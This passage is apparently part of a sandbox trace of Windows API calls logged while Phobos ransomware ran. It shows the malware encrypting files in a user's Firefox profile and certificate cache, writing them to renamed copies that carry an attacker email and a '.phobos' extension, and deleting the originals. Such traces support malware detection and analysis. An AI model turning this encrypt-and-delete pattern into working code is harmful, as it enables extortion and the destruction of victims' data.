pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0194.990] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.990] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0194.990] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.990] CloseHandle (hObject=0x154) returned 1 [0194.990] CloseHandle (hObject=0x14c) returned 1 [0194.990] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore")) returned 1 [0194.991] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.185] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=940534) returned 1 [0195.185] CloseHandle (hObject=0x14c) returned 1 [0195.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little")) returned 0x2020 [0195.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.185] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.186] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.341] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0195.341] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.342] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe59f6, lpOverlapped=0x0) returned 1 [0195.502] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe5a00, dwBufLen=0xe5a00 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe5a00) returned 1 [0195.510] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe5a00, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe5a00, lpOverlapped=0x0) returned 1 [0195.525] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0195.525] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.525] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0195.525] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.525] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0195.530] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.546] CloseHandle (hObject=0x14c) returned 1 [0195.546] CloseHandle (hObject=0xac) returned 1 [0195.546] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little")) returned 1 [0195.553] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0195.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.620] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=325) returned 1 [0195.620] CloseHandle (hObject=0x12c) returned 1 [0195.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d")) returned 0x2024 [0195.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.621] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.621] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0195.622] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.622] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x145, lpOverlapped=0x0) returned 1 [0195.623] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0195.623] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x150, lpOverlapped=0x0) returned 1 [0195.624] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0195.624] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.624] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0195.624] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.624] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0195.624] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.625] CloseHandle (hObject=0x12c) returned 1 [0195.625] CloseHandle (hObject=0x14c) returned 1 [0195.625] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d")) returned 1 [0195.626] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0195.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.627] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=471) returned 1 [0195.627] CloseHandle (hObject=0x14c) returned 1 [0195.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398")) returned 0x2024 [0195.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.627] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.627] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.628] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0195.628] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.628] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d7, lpOverlapped=0x0) returned 1 [0195.638] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0195.638] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0195.639] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0195.639] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.639] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0195.639] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.639] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0195.639] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.639] CloseHandle (hObject=0x14c) returned 1 [0195.639] CloseHandle (hObject=0x12c) returned 1 [0195.948] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398")) returned 1 [0195.950] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0195.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.950] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=727) returned 1 [0195.951] CloseHandle (hObject=0x14c) returned 1 [0195.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77")) returned 0x2024 [0195.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0195.951] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.951] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0195.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0195.952] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0195.952] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2d7, lpOverlapped=0x0) returned 1 [0196.159] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2e0) returned 1 [0196.159] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2e0, lpOverlapped=0x0) returned 1 [0196.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.160] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.160] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.160] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.160] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.161] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.161] CloseHandle (hObject=0x14c) returned 1 [0196.161] CloseHandle (hObject=0x154) returned 1 [0196.161] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77")) returned 1 [0196.161] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.173] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=471) returned 1 [0196.173] CloseHandle (hObject=0x154) returned 1 [0196.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4")) returned 0x2024 [0196.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: 